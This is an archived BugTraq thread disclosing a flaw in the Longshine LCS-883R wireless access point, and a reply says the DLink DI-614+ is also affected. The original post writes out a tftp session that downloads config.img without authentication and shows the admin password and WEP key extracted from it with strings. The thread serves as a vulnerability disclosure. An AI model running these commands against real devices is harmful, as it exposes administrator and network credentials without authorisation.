BugTraq
Longshine WLAN Access-Point LCS-883R VU#310201 Jan 06 2003 10:52AM
Lukas Grunwald (lukas dnx de) (1 replies)
Re: Longshine WLAN Access-Point LCS-883R VU#310201 Jan 06 2003 06:57PM
heydowns borg com
This vulnerability is also an issue on the popular DLink DI-614+ (which I
think is based upon the Longshine product). I was able to grab config.img
and also extract the "admin" password from it. This was confirmed with
firmware version 2.03 dated 9/10/2002.

On the DLink product, you can only perform this from the "LAN-side" of the
device in the default configuration.

DLink has version 2.10 available, dated 11/25/2002, but I have not tried
it yet.

-Jeff

On Mon, 6 Jan 2003, Lukas Grunwald wrote:

>
>
> Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
>
> Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
>
> Description: Get Superuser Privileges and view the devices password and password and other passwords
>
> Versions affected: tested with 03.01.0b and 03.01.0h
>
> Vendor contacted: e-mailed Longshine at Sun Dec 29
>
> Details: You are able to connect via tftp to the access-point an you can get download the configuration
> without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
> In this configuration in the Username of the Superuser and the corresponding password stored.
> The WEP Secret for the encryption and the password from your radius server is also readable.
> This "attack" works via WLAN (!!!) and Ethernet.
>
> tftp
> tftp> connect 192.168.108.48
> tftp> get config.img
> Received 780 bytes in 1.0 seconds
> tftp> quit
>
> [~]/-\>strings config.img
> DNXLABAP01 <- name of the AP
> root <- name of the superuser
> XXXXXX123 <- password from superuser
> DNXLABLAN <- ssid
> secu9 <- secret for WEP
> 7890abcdef <-
>
> You are also able to get the following files:
>
> config.img
> wbtune.dat
> mac.dat
> rom.img
> normal.img
>
>
> Solution: after contact with the vendor he claims that a new firmware-upgrade
> fixes this problem, but the latest available firmware on his web-page
> dosn't fix it anyway.
>
> Vendor-Contact:
>
> LONGSHINE Technologie (Europe) GmbH
>
> An der Strusbek 9
> D-22926 Ahrensburg
>
> Tel: ++ 49 ( 0 ) 4102 / 4922- 0
> Fax: ++ 49 ( 0 ) 4102 / 40109
>
> support (at) longshine (dot) de [email concealed]
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus